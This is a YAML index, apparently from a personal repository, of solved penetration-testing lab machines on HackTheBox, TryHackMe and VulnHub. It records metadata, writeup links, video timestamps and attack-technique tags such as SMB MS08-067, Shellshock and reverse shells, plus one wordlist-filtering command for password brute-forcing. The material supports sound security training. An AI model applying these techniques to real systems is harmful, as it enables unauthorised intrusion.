    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf
  - datetime: 20191101
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 15488
      - 8540
      - 4788
      - 1547
      - 7085
      - 301
      - 141
      - 83
      - 51
      - 108
      free: false
      id: 2
      infrastructure: hackthebox
      ip: 10.10.10.4
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4.1
        - 4.7
        - 7.6
        - 2.4
        - 5.3
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png
      name: Legacy
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.3'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png
      release: '2017-03-15'
      retired: true
      retired_date: '2017-05-26'
      root_owns: 21190
      shortname: legacy
      url: https://app.hackthebox.eu/machines/2
      user_owns: 20465
      verbose_id: hackthebox#2
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_smb_ms08_067
            privesc: []
    name: Legacy
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_smb_ms08_067
    url: https://app.hackthebox.eu/machines/2
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf
  - datetime: 20191112
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 2118
      - 2826
      - 3475
      - 1974
      - 5645
      - 497
      - 372
      - 185
      - 50
      - 81
      free: false
      id: 64
      infrastructure: hackthebox
      ip: 10.10.10.48
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png
      maker:
        id: 2904
        name: Arrexel
      maker2: null
      matrix:
        aggregate:
        - 5
        - 6.3
        - 5
        - 5
        - 3.7
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/matrix.png
      name: Mirai
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.5'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/ratings.png
      release: '2017-09-01'
      retired: true
      retired_date: '2018-02-10'
      root_owns: 9578
      shortname: mirai
      url: https://app.hackthebox.eu/machines/64
      user_owns: 9943
      verbose_id: hackthebox#64
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf
      writeups:
        ippsec:
          description:
            00:00:49 - Nmap: https://www.youtube.com/watch?v=SRmvRGUuuno&t=49s
            00:01:31 - Examining some odd behavior. Nmap different result than browser.: https://www.youtube.com/watch?v=SRmvRGUuuno&t=91s
            00:04:00 - Getting to /admin and testing for Zone Transfer: https://www.youtube.com/watch?v=SRmvRGUuuno&t=240s
            00:05:40 - Testing SSH Default Raspberry Pi Creds: https://www.youtube.com/watch?v=SRmvRGUuuno&t=340s
            00:06:11 - Escalate to root 'sudo su': https://www.youtube.com/watch?v=SRmvRGUuuno&t=371s
            00:07:10 - Recovering the deleted root.txt: https://www.youtube.com/watch?v=SRmvRGUuuno&t=430s
            00:08:38 - GrepFu: https://www.youtube.com/watch?v=SRmvRGUuuno&t=518s
            00:10:40 - Downloading /dev/sdb via SSH: https://www.youtube.com/watch?v=SRmvRGUuuno&t=640s
            00:12:48 - Running Binwalk against it: https://www.youtube.com/watch?v=SRmvRGUuuno&t=768s
            00:13:18 - Trying to recover with TestDisk: https://www.youtube.com/watch?v=SRmvRGUuuno&t=798s
            00:14:37 - Trying to recover with PhotoRec: https://www.youtube.com/watch?v=SRmvRGUuuno&t=877s
          name: HackTheBox - Mirai
          video_url: https://www.youtube.com/watch?v=SRmvRGUuuno&t=0
    name: Mirai
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.mirai/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_defaultcreds
    - privesc_sudoers
    url: https://app.hackthebox.eu/machines/64
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf
  - datetime: 20191104
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 5548
      - 5178
      - 4949
      - 3074
      - 7608
      - 982
      - 678
      - 370
      - 103
      - 155
      free: false
      id: 6
      infrastructure: hackthebox
      ip: 10.10.10.8
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png
      maker:
        id: 1
        name: ch4p
      maker2: null
      matrix:
        aggregate:
        - 4.7
        - 5.8
        - 7.3
        - 2.7
        - 4.2
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/matrix.png
      name: Optimum
      os: Windows
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.5'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/ratings.png
      release: '2017-03-18'
      retired: true
      retired_date: '2017-10-28'
      root_owns: 13491
      shortname: optimum
      url: https://app.hackthebox.eu/machines/6
      user_owns: 18282
      verbose_id: hackthebox#6
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf
      writeups:
        ippsec:
          description:
            00:01:38 - Go to HTTPFileServer: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=98s
            00:02:56 - Explanation of Vulnerability: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=176s
            00:04:49 - Testing the Exploit: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=289s
            00:06:25 - Getting rev tcp shell with Nishang: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=385s
            00:11:54 - Shell returned: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=714s
            00:13:15 - Finding exploits with Sherlock: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=795s
            00:15:15 - Using Empire Module without Empire for Privesc: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=915s
            00:21:00 - Start of doing the box with Metasploit: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=1260s
            00:22:36 - Reverse Shell Returned (x32): https://www.youtube.com/watch?v=kWTnVBIpNsE&t=1356s
            00:24:45 - MSF Error during PrivEsc: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=1485s
            00:25:35 - Reverse Shell Returned (x64): https://www.youtube.com/watch?v=kWTnVBIpNsE&t=1535s
            00:26:19 - Same PrivEsc as earlier, different result: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=1579s
            00:28:47 - Examining how Rejetto MSF Module works with Burp: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=1727s
          name: HackTheBox - Optimum
          video_url: https://www.youtube.com/watch?v=kWTnVBIpNsE&t=0
    name: Optimum
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.optimum/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_hfs_cmd_exec
    - privesc_windows_ms16_098
    url: https://app.hackthebox.eu/machines/6
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf
  - datetime: 20191113
    infra: HackTheBox
    machine:
      difficulty: easy
      difficulty_ratings:
      - 2349
      - 2815
      - 4101
      - 2563
      - 5585
      - 598
      - 387
      - 153
      - 52
      - 75
      free: false
      id: 108
      infrastructure: hackthebox
      ip: 10.10.10.56
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png
      maker:
        id: 2984
        name: mrb3n
      maker2: null
      matrix:
        aggregate:
        - 6.1
        - 6.2
        - 7.5
        - 2.5
        - 3.8
        maker:
        - 0
        - 0
        - 0
        - 0
        - 0
      matrixurl: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/matrix.png
      name: Shocker
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: 20
      private: false
      rating: '4.8'
      ratingsurl: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/ratings.png
      release: '2017-09-30'
      retired: true
      retired_date: '2018-02-17'
      root_owns: 10173
      shortname: shocker
      url: https://app.hackthebox.eu/machines/108
      user_owns: 10350
      verbose_id: hackthebox#108
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf
      writeups:
        ippsec:
          description:
            '00:00:01 - If you want some more details about the actual ShellShock exploit, check out the Beep Video. ': https://www.youtube.com/watch?v=IBlTdguhgfY&t=1s
            00:00:39 - Begin Nmap, OS Enum via SSH/HTTP Banner: https://www.youtube.com/watch?v=IBlTdguhgfY&t=39s
            00:05:00 - GoBuster: https://www.youtube.com/watch?v=IBlTdguhgfY&t=300s
            00:07:08 - Viewing CGI Script: https://www.youtube.com/watch?v=IBlTdguhgfY&t=428s
            00:08:50 - Begin NMAP Shellshock: https://www.youtube.com/watch?v=IBlTdguhgfY&t=530s
            00:09:50 - Debugging Nmap HTTP Scripts via Burp: https://www.youtube.com/watch?v=IBlTdguhgfY&t=590s
            00:11:10 - Fixing the HTTP Request & nmap script: https://www.youtube.com/watch?v=IBlTdguhgfY&t=670s
            00:14:45 - Performing Shellshock & more fixing: https://www.youtube.com/watch?v=IBlTdguhgfY&t=885s
            00:18:25 - Getting a reverse shell: https://www.youtube.com/watch?v=IBlTdguhgfY&t=1105s
            00:21:19 - Running LinEnum.sh: https://www.youtube.com/watch?v=IBlTdguhgfY&t=1279s
            00:23:00 - Rooting the box: https://www.youtube.com/watch?v=IBlTdguhgfY&t=1380s
          name: HackTheBox - Shocker
          video_url: https://www.youtube.com/watch?v=IBlTdguhgfY&t=0
    name: Shocker
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_shellshock
    - privesc_sudoers
    url: https://app.hackthebox.eu/machines/108
    writeup: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf
  - datetime: 20200730
    infra: TryHackMe
    machine:
      description: Don't underestimate the sly old fox...
      difficulty: hard
      difficulty_ratings: null
      id: tryhackme#yotf
      infrastructure: tryhackme
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png
      maker:
        id: null
        name: MuirlandOracle
        url: null
      matrixurl: null
      name: Year of the Fox
      os: null
      oscplike: false
      owned_root: true
      owned_user: true
      points: 40
      private: false
      ratingsurl: null
      release: '2020-06-18T14:25:08.754Z'
      series:
        id: null
        name: null
        url: null
      shortname: yotf
      url: https://tryhackme.com/room/yotf
      verbose_id: tryhackme#yotf
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_proto_http
            exploit:
            - exploit_command_injection
            privesc:
            - privesc_env_relative_path
    name: Year of the Fox
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png"
      width="100" height="100" />
    points: null
    status: public
    tags:
    - enumerate_proto_http
    - exploit_command_injection
    - privesc_env_relative_path
    url: https://tryhackme.com/room/yotf
    writeup: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf
  - datetime: 20190905
    infra: VulnHub
    machine:
      description: 'IMPORTANT NOTE: do not use host-only mode, as issues have been
        discovered. Set the Billy Madison VM to "auto-detect" to get a regular DHCP
        address off your network.

        Plot:

        Help Billy Madison stop Eric from taking over Madison Hotels!

        Sneaky Eric Gordon has installed malware on Billy''s computer right before
        the two of them are set to face off in an academic decathlon. Unless Billy
        can regain control of his machine and decrypt his 12th grade final project,
        he will not graduate from high school. Plus, it means Eric wins, and he takes
        over as head of Madison Hotels!

        Objective:

        The primary objective of the VM is to figure out how Eric took over the machine
        and then undo his changes so you can recover Billy''s 12th grade final project.
        You will probably need to root the box to complete this objective.

        Download:

        Other Information:

        Special Thanks To:'
      difficulty: null
      difficulty_ratings: null
      id: 161
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png
      maker:
        id: 256
        name: Brian Johnson
        url: https://www.vulnhub.com/author/brian-johnson,256/
      matrixurl: null
      name: 'Billy Madison: 1.1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 14 Sep 2016
      series:
        id: 94
        name: Billy Madison
        url: https://www.vulnhub.com/series/billy-madison,94/
      shortname: 'billy madison: 1.1'
      url: https://www.vulnhub.com/entry/billy-madison-11,161/
      verbose_id: vulnhub#161
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit: []
            privesc:
            - privesc_setuid
            - privesc_cron
            - privesc_sudoers
    name: 'Billy Madison: 1.1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png"
      width="100" height="100" />
    points: 40
    status: public
    tags:
    - privesc_setuid
    - privesc_cron
    - privesc_sudoers
    url: https://www.vulnhub.com/entry/billy-madison-11,161/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf
  - datetime: 20190831
    infra: VulnHub
    machine:
      description: 'Source: Brainpan.zip/readme.txt

        Source: Brainpan.zip/md5.txt'
      difficulty: null
      difficulty_ratings: null
      id: 51
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png
      maker:
        id: 43
        name: superkojiman
        url: https://www.vulnhub.com/author/superkojiman,43/
      matrixurl: null
      name: 'Brainpan: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 20 Mar 2013
      series:
        id: 32
        name: Brainpan
        url: https://www.vulnhub.com/series/brainpan,32/
      shortname: 'brainpan: 1'
      url: https://www.vulnhub.com/entry/brainpan-1,51/
      verbose_id: vulnhub#51
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_bof
            privesc:
            - privesc_anansi
            - privesc_sudo
    name: 'Brainpan: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png"
      width="100" height="100" />
    points: 40
    status: public
    tags:
    - exploit_bof
    - privesc_anansi
    - privesc_sudo
    url: https://www.vulnhub.com/entry/brainpan-1,51/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
  - datetime: 20190909
    infra: VulnHub
    machine:
      description: "Boot2root challenges aim to create a safe environment where you\
        \ can perform real-world penetration testing on an (intentionally) vulnerable\
        \ target.\nThis workshop will provide you with a custom-made VM where the\
        \ goal is to obtain root level access on it. \nThis is a great chance for\
        \ people who want to get into pentesting but don\u2019t know where to start.\
        \ *\nIf this sounds intimidating, don\u2019t worry! During the workshop, we\u2019\
        ll be discussing various methodologies, common pitfalls and useful tools at\
        \ every step of our pentest.\nRequirements:"
      difficulty: null
      difficulty_ratings: null
      id: 231
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png
      maker:
        id: 393
        name: abatchy
        url: https://www.vulnhub.com/author/abatchy,393/
      matrixurl: null
      name: 'BSides Vancouver: 2018 (Workshop)'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 21 Mar 2018
      series:
        id: 156
        name: BSides Vancouver
        url: https://www.vulnhub.com/series/bsides-vancouver,156/
      shortname: 'bsides vancouver: 2018 (workshop)'
      url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
      verbose_id: vulnhub#231
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_proto_ftp
            - enumerate_proto_ssh
            - enumerate_proto_http
            - enumerate_app_wordpress
            exploit:
            - exploit_ssh_bruteforce
            - exploit_wordpress_plugin_hellodolly
            - exploit_php_reverseshell
            privesc:
            - privesc_cron
            - privesc_sudoers
    name: 'BSides Vancouver: 2018 (Workshop)'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - enumerate_proto_ftp
    - enumerate_proto_ssh
    - exploit_ssh_bruteforce
    - enumerate_proto_http
    - enumerate_app_wordpress
    - exploit_wordpress_plugin_hellodolly
    - exploit_php_reverseshell
    - privesc_cron
    - privesc_sudoers
    url: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
  - datetime: 20190910
    infra: VulnHub
    machine:
      description: 'DC-6 is another purposely built vulnerable lab with the intent
        of gaining experience in the world of penetration testing.

        This isn''t an overly difficult challenge so should be great for beginners.

        The ultimate goal of this challenge is to get root and to read the one and
        only flag.

        Linux skills and familiarity with the Linux command line are a must, as is
        some experience with basic penetration testing tools.

        For beginners, Google can be of great assistance, but you can always tweet
        me at @DCAU7 for assistance to get you going again. But take note: I won''t
        give you the answer, instead, I''ll give you an idea about how to move forward.

        DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn''t be any
        issues running it on most PCs.

        I have tested this on VMWare Player, but if there are any issues running this
        VM in VMware, have a read through of this.

        It is currently configured for Bridged Networking, however, this can be changed
        to suit your requirements. Networking is configured for DHCP.

        Installation is simple - download it, unzip it, and then import it into VirtualBox
        or VMWare and away you go.

        NOTE: You WILL need to edit your hosts file on your pentesting device so that
        it reads something like:

        192.168.0.142 wordy

        NOTE: I''ve used 192.168.0.142 as an example. You''ll need to use your normal
        method to determine the IP address of the VM, and adapt accordingly.

        This is VERY important.

        And yes, it''s another WordPress based VM (although only my second one).

        While there should be no problems using this VM, by downloading it, you accept
        full responsibility for any unintentional damage that this VM may cause.

        In saying that, there shouldn''t be any problems, but I feel the need to throw
        this out there just in case.

        I''m also very interested in hearing how people go about solving these challenges,
        so if you''re up for writing a walkthrough, please do so and send me a link,
        or alternatively, follow me on Twitter, and DM me (you can unfollow after
        you''ve DM''d me if you''d prefer).

        I can be contacted via Twitter - @DCAU7

        OK, this isn''t really a clue as such, but more of some "we don''t want to
        spend five years waiting for a certain process to finish" kind of advice for
        those who just want to get on with the job.

        cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

        That should save you a few years. ;-)'
      difficulty: null
      difficulty_ratings: null
      id: 315
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png
      maker:
        id: 610
        name: DCAU
        url: https://www.vulnhub.com/author/dcau,610/
      matrixurl: null
      name: 'DC: 6'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 26 Apr 2019
      series:
        id: 199
        name: DC
        url: https://www.vulnhub.com/series/dc,199/
      shortname: 'dc: 6'
      url: https://www.vulnhub.com/entry/dc-6,315/
      verbose_id: vulnhub#315
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate:
            - enumerate_app_wordpress
            exploit:
            - exploit_wordpress_plugin_activitymonitor
            privesc:
            - privesc_mysql_creds
            - privesc_sudo
            - privesc_nmap
    name: 'DC: 6'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - enumerate_app_wordpress
    - exploit_wordpress_plugin_activitymonitor
    - privesc_mysql_creds
    - privesc_sudo
    - privesc_nmap
    url: https://www.vulnhub.com/entry/dc-6,315/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
  - datetime: 20190917
    infra: VulnHub
    machine:
      description: 'Escalate_Linux - A intentionally developed Linux vulnerable virtual
        machine.The main focus of this machine is to learn Linux

        Post Exploitation (Privilege Escalation) Techniques.

        "Escalate_Linux" A Linux vulnerable virtual machine contains different features
        as.'
      difficulty: null
      difficulty_ratings: null
      id: 323
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png
      maker:
        id: 627
        name: Manish Gupta
        url: https://www.vulnhub.com/author/manish-gupta,627/
      matrixurl: null
      name: 'Escalate_Linux: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 30 Jun 2019
      series:
        id: 218
        name: Escalate_Linux
        url: https://www.vulnhub.com/series/escalate_linux,218/
      shortname: 'escalate_linux: 1'
      url: https://www.vulnhub.com/entry/escalate_linux-1,323/
      verbose_id: vulnhub#323
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_python_reverseshell
            privesc:
            - privesc_mysql_creds
            - privesc_setuid
    name: 'Escalate_Linux: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_python_reverseshell
    - privesc_mysql_creds
    - privesc_setuid
    url: https://www.vulnhub.com/entry/escalate_linux-1,323/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf
  - datetime: 20190911
    infra: VulnHub
    machine:
      description: ''
      difficulty: null
      difficulty_ratings: null
      id: 133
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png
      maker:
        id: 203
        name: Ar0xA
        url: https://www.vulnhub.com/author/ar0xa,203/
      matrixurl: null
      name: 'FristiLeaks: 1.3'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 14 Dec 2015
      series:
        id: 71
        name: FristiLeaks
        url: https://www.vulnhub.com/series/fristileaks,71/
      shortname: 'fristileaks: 1.3'
      url: https://www.vulnhub.com/entry/fristileaks-13,133/
      verbose_id: vulnhub#133
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_php_fileupload
            - exploit_php_fileupload_bypass
            privesc:
            - privesc_sudo
            - privesc_setuid
    name: 'FristiLeaks: 1.3'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png"
      width="100" height="100" />
    points: 30
    status: public
    tags:
    - exploit_php_fileupload
    - exploit_php_fileupload_bypass
    - privesc_sudo
    - privesc_setuid
    url: https://www.vulnhub.com/entry/fristileaks-13,133/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf
  - datetime: 20190927
    infra: VulnHub
    machine:
      description: '''hackme'' is a beginner difficulty level box. The goal is to
        gain limited privilege access via web vulnerabilities and subsequently privilege
        escalate as root. The lab was created to mimic real life environment.

        ''hackme'' uses DHCP and in the possible event that the mysqld shuts down
        on its own (very rare cases), attempt to force restart the machine and it
        should be working fine subsequently.'
      difficulty: null
      difficulty_ratings: null
      id: 330
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png
      maker:
        id: 628
        name: x4bx54
        url: https://www.vulnhub.com/author/x4bx54,628/
      matrixurl: null
      name: 'hackme: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 18 Jul 2019
      series:
        id: 221
        name: hackme
        url: https://www.vulnhub.com/series/hackme,221/
      shortname: 'hackme: 1'
      url: https://www.vulnhub.com/entry/hackme-1,330/
      verbose_id: vulnhub#330
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_php_fileupload
            - exploit_php_reverseshell
            privesc:
            - privesc_setuid
    name: 'hackme: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_php_fileupload
    - exploit_php_reverseshell
    - privesc_setuid
    url: https://www.vulnhub.com/entry/hackme-1,330/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf
  - datetime: 20190926
    infra: VulnHub
    machine:
      description: "Welcome to \"IMF\", my first Boot2Root virtual machine. IMF is\
        \ a intelligence agency that you must hack to get all flags and ultimately\
        \ root. The flags start off easy and get harder as you progress. Each flag\
        \ contains a hint to the next flag. I hope you enjoy this VM and learn something.\
        \ \nDifficulty: Beginner/Moderate\nCan contact me at: geckom at redteamr dot\
        \ com or on Twitter: @g3ck0m"
      difficulty: null
      difficulty_ratings: null
      id: 162
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png
      maker:
        id: 332
        name: Geckom
        url: https://www.vulnhub.com/author/geckom,332/
      matrixurl: null
      name: 'IMF: 1'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 30 Oct 2016
      series:
        id: 95
        name: IMF
        url: https://www.vulnhub.com/series/imf,95/
      shortname: 'imf: 1'
      url: https://www.vulnhub.com/entry/imf-1,162/
      verbose_id: vulnhub#162
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_php_fileupload_bypass
            privesc:
            - privesc_bof
    name: 'IMF: 1'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png"
      width="100" height="100" />
    points: 40
    status: public
    tags:
    - exploit_php_fileupload_bypass
    - privesc_bof
    url: https://www.vulnhub.com/entry/imf-1,162/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf
  - datetime: 20200810
    infra: VulnHub
    machine:
      description: "This box should be easy. This machine was created for the InfoSec\
        \ Prep Discord Server (https://discord.gg/RRgKaep) as a give way for a 30d\
        \ voucher to the OSCP Lab, Lab materials, and an exam attempt.\nThe box was\
        \ created with VMWare Workstation, but it should work with VMWare Player and\
        \ Virtualbox. Upon booting up it should display an IP address. This is the\
        \ target address based on whatever settings you have. You should verify the\
        \ address just incase. \nFind the flag.txt in /root/ and submit it to the\
        \ TryHarder bot on Discord to enter the give away. The command is only available\
        \ for so long. So if you are just joining the server or doing the box for\
        \ fun, the command won't be there any longer at a later time.\nPlease do not\
        \ publish any write ups for this box until August 7, 2020 as this is probably\
        \ when the give away will end. After that, fair game!\nA big thanks to Offensive\
        \ Security for providing the OSCP voucher. \nBox created by FalconSpy with\
        \ the support of the staff at InfoSec Prep Discord Server"
      difficulty: null
      difficulty_ratings: null
      id: 508
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png
      maker:
        id: 646
        name: FalconSpy
        url: https://www.vulnhub.com/author/falconspy,646/
      matrixurl: null
      name: 'InfoSec Prep: OSCP'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 11 Jul 2020
      series:
        id: 336
        name: InfoSec Prep
        url: https://www.vulnhub.com/series/infosec-prep,336/
      shortname: 'infosec prep: oscp'
      url: https://www.vulnhub.com/entry/infosec-prep-oscp,508/
      verbose_id: vulnhub#508
